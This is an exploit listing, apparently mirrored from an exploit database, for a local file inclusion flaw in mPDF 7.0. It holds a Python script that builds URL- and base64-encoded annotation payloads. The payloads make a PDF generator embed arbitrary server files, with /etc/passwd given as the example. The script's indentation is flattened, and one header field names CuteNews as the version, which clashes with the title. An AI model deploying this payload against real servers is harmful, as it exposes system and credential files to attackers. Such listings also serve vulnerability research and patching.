Share
## https://sploitus.com/exploit?id=PACKETSTORM:167897
# Exploit Title: mPDF 7.0 - Local File Inclusion  
# Google Dork: N/A  
# Date: 2022-07-23  
# Exploit Author: Musyoka Ian  
# Vendor Homepage: https://mpdf.github.io/  
# Software Link: https://mpdf.github.io/  
# Version: CuteNews  
# Tested on: Ubuntu 20.04, mPDF 7.0.x  
# CVE: N/A  
  
#!/usr/bin/env python3  
  
from urllib.parse import quote  
from cmd import Cmd  
from base64 import b64encode  
  
class Terminal(Cmd):  
prompt = "\nFile >> "  
def default(self, args):  
payload_gen(args)  
def banner():  
banner = """ _____ _____ ______ ______ ___ __ __ _ _ _   
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |   
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_   
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|  
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_   
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|  
| |   
|_| """  
print(banner)  
def payload_gen(fname):  
payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'  
encoded_payload = quote(payload)  
print("[+] Replace the content with the payload below")  
  
print(f"Url encoded payload:\n{encoded_payload}\n")  
base64enc = b64encode(encoded_payload.encode())  
print(f"Base64 encoded payload:\n{base64enc.decode()}\n")  
if __name__ == ("__main__"):  
banner()  
print("Enter Filename eg. /etc/passwd")  
terminal= Terminal()  
terminal.cmdloop()